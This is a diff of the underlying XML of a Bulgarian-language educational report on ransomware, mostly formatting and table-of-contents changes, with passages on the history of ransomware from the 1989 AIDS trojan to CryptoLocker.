--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -327,51 +327,7 @@
           <w:szCs w:val="40"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Какво представлява </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">? Стратегии и защита от </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Какво представлява ransomware? Стратегии и защита от ransomware.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -531,7 +487,7 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -543,7 +499,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223299641" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339493" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -571,7 +527,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299641 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339493 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -611,10 +567,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299642" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339494" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -649,7 +605,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299642 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339494 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -689,10 +645,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299643" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339495" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -727,7 +683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299643 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339495 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -768,10 +724,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299644" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339496" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -783,7 +739,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -821,7 +777,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299644 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339496 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -862,10 +818,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299645" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339497" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -877,7 +833,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -930,7 +886,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299645 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339497 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -971,10 +927,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299646" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339498" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -987,7 +943,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1018,7 +974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299646 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339498 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1059,10 +1015,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299647" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339499" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1075,7 +1031,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1128,7 +1084,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299647 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339499 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1169,10 +1125,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299648" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339500" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1184,7 +1140,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1230,7 +1186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299648 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339500 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1270,10 +1226,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299649" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339501" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1308,7 +1264,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299649 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339501 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1349,10 +1305,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299650" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339502" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1364,7 +1320,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1388,22 +1344,124 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve"> и </w:t>
-            </w:r>
+              <w:t xml:space="preserve"> инциденти</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339502 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="720"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223339503" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">Data Extortion </w:t>
+              <w:t>2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>инциденти</w:t>
+              <w:t xml:space="preserve">Превенция на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ransomware </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">при </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>nternet-Facing Vulnerabilities</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1424,7 +1482,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299650 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339503 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1444,7 +1502,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1464,10 +1522,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223299651" w:history="1">
+          <w:hyperlink w:anchor="_Toc223339504" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1494,7 +1552,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223299651 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223339504 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1514,7 +1572,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1556,7 +1614,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223299641"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223339493"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -1573,13 +1631,8 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Рансъмуерът</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> </w:t>
+      <w:r>
+        <w:t>Рансъмуерът </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">е вид зловреден софтуер, който криптира файлове и ограничава достъпа до дадена система. Хакерът изисква откуп от ощетения, обикновено парична сума (в биткойн), в замяна откраднатите данни. </w:t>
@@ -1653,15 +1706,7 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) могат сериозно да нарушат бизнес процесите. Организациите често губят достъп до важна информация, необходима за нормалната им работа и предоставяне на критични услуги.</w:t>
+        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (ransomware) могат сериозно да нарушат бизнес процесите. Организациите често губят достъп до важна информация, необходима за нормалната им работа и предоставяне на критични услуги.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -1737,7 +1782,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223299642"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223339494"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -1797,158 +1842,116 @@
         <w:t xml:space="preserve"> атаки е: “</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">AIDS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trojan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (PC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cyborg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>AIDS trojan (PC Cyborg Virus)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Разпространяван е чрез флопи дискети през 1989 година. Потърпевшите са накарани да изпратят 189$ през пощенска кутия в Панама, за да възстановят достъпа до системите си, въпреки че методът за криптирани е бил сравнително прост – чрез симетрично криптиране. Симетричното криптиране  е техника, където един и същи ключ се използва за криптиране и декриптиране на данните. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> става широко разпространен чак през ранните две хилядни</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – вероятно поради трудността хакера да си получи откупа. Появата на биткойна и криптовалутите променят това. Лесен и удобен начин е за получаване на крупната сума от потърпевшия като остават незабелязани. При традиционното банкиране участниците са ясно идентифицирани – име, банка, държава, регулации и т.н. При криптовалутите адрес на сметката не съдържа директна лична информация. Липсва и централизиран контролен орган. Преводите са почти невъзможни да бъдат спрени, замразени, върнати или проследени от институциите.  Изпирането на валутата е сравнително лесно – чрез т.нар. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>chain hopping (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">прехвърляне между различни криптовалути) и използване на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>privacy coins.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Минус на биткойна, е че не всяка жертва е достатъчно запознат как да го предостави и да се откупи. Някои от хакерите са заловени, понеже са </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пускали видеоконференции, за да покажат как да го направят.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">През 2013 г. се появява </w:t>
+      </w:r>
+      <w:r>
+        <w:t>CryptoLocker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, което бележи повратен момент в развитието на ransomware. Този нов вид изнудващ зловреден софтуер използва плащания чрез Bitcoin и прилага по-съвременни криптографски методи. Той използва 2048-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bit</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Virus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>”.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Разпространяван е чрез флопи дискети през 1989 година. Потърпевшите са накарани да изпратят 189$ през пощенска кутия в Панама, за да възстановят достъпа до системите си, въпреки че методът за криптирани е бил сравнително прост – чрез симетрично криптиране. Симетричното криптиране  е техника, където един и същи ключ се използва за криптиране и декриптиране на данните. </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RSA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>key pairs</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, генерирани от командно-контролен сървър и изпращани към жертвата.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ransomware</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> става широко разпространен чак през ранните две хилядни</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – вероятно поради трудността хакера да си получи откупа. Появата на биткойна и криптовалутите променят това. Лесен и удобен начин е за получаване на крупната сума от потърпевшия като остават незабелязани. При традиционното банкиране участниците са ясно идентифицирани – име, банка, държава, регулации и т.н. При криптовалутите адрес на сметката не съдържа директна лична информация. Липсва и централизиран контролен орган. Преводите са почти невъзможни да бъдат спрени, замразени, върнати или проследени от институциите.  Изпирането на валутата е сравнително лесно – чрез т.нар. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>chain hopping (</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">прехвърляне между различни криптовалути) и използване на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>privacy coins.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Минус на биткойна, е че не всяка жертва е достатъчно запознат как да го предостави и да се откупи. Някои от хакерите са заловени, понеже са </w:t>
-      </w:r>
-      <w:r>
-        <w:t>пускали видеоконференции, за да покажат как да го направят.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">През 2013 г. се появява </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CryptoLocker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, което бележи повратен момент в развитието на </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Този нов вид изнудващ зловреден софтуер използва плащания чрез </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Bitcoin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи. Той използва 2048-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bit</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RSA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>key pairs</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, генерирани от командно-контролен сървър и изпращани към жертвата.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223299643"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223339495"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -1975,7 +1978,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223299644"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223339496"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2011,31 +2014,7 @@
         <w:t xml:space="preserve"> е показано, съобщението, което се визуализира на системата афектирана от троянския кон - </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">AIDS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trojan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (PC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cyborg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Virus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>AIDS trojan (PC Cyborg Virus)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
@@ -2100,7 +2079,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039D1F71" wp14:editId="4DF4CFA7">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039D1F71" wp14:editId="27E507B6">
             <wp:extent cx="5760720" cy="2816225"/>
             <wp:effectExtent l="0" t="0" r="0" b="3175"/>
             <wp:docPr id="1163389886" name="Picture 2" descr="undefined"/>
@@ -2118,6 +2097,13 @@
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId12">
+                      <a:duotone>
